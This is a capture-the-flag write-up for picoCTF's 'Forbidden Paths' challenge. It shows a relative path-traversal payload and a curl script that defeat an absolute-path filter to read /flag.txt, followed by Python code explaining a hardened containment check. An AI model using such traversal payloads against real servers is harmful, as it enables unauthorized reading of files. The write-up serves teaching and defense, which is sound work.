Forbidden Paths
Description
Can you get the flag?
Here's the website.
We know that the website files live in '/usr/share/nginx/html/' and the flag is at '/flag.txt' but the website is filtering absolute file paths. Can you get past the filter to read the flag?
Solving
- Open the site and you will see a form where you can read files.
- Some tests reveal that the form is vulnerable to path traversal.
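- The filter only rejects absolute paths, so let's try a relative path-traversal location. The web root '/usr/share/nginx/html/' is four directories deep, so four '../' segments climb back to '/':
../../../../flag.txt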
- This script will get the flag for you; feel free to use it.
#!/bin/bash
# -s silences curl's progress meter; the response body must reach grep on stdout
curl -s -X POST "http://saturn.picoctf.net:52472/read.php" -d "filename=../../../../flag.txt" | grep -o "picoCTF{.*}"
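
Why the filter fails and how a containment check closes the gap, as an added example in Python (not the challenge's server code, which this page does not show). `naive_filter_allows` is an assumed model of the absolute-path filter; every function name and sample input below is constructed for illustration.

```python
import posixpath

WEB_ROOT = "/usr/share/nginx/html"  # web root given in the challenge description


def naive_filter_allows(filename: str) -> bool:
    """Assumed model of the challenge filter: reject absolute paths only."""
    return not filename.startswith("/")


def resolve(filename: str) -> str:
    """Path the server would open: join to the web root, then collapse '..'.

    This is lexical normalization only. A real server should use
    os.path.realpath so that symlinks are resolved as well.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, filename))


def hardened_filter_allows(filename: str) -> bool:
    """Normalize first, then require the result to stay inside the web root."""
    if "\x00" in filename:
        return False
    # commonpath compares whole path components, so a sibling directory such
    # as /usr/share/nginx/html_backup does not pass as a string prefix would.
    return posixpath.commonpath([WEB_ROOT, resolve(filename)]) == WEB_ROOT


def audit(samples):
    """Return (input, resolved path, naive verdict, hardened verdict) rows."""
    return [
        (s, resolve(s), naive_filter_allows(s), hardened_filter_allows(s))
        for s in samples
    ]


# Constructed sample inputs: two legitimate requests and three escapes.
SAMPLES = [
    "index.html",
    "css/../index.html",
    "/flag.txt",
    "../../../../flag.txt",
    "../html_backup/secret.txt",
]

if __name__ == "__main__":
    for name, path, naive, hardened in audit(SAMPLES):
        print(f"{name!r:30} -> {path:40} naive={naive!s:5} hardened={hardened}")
```

The traversal string passes the naive check because it never starts with '/', yet it resolves to '/flag.txt'; the hardened check rejects it because the decision is made on the resolved path rather than on the raw input.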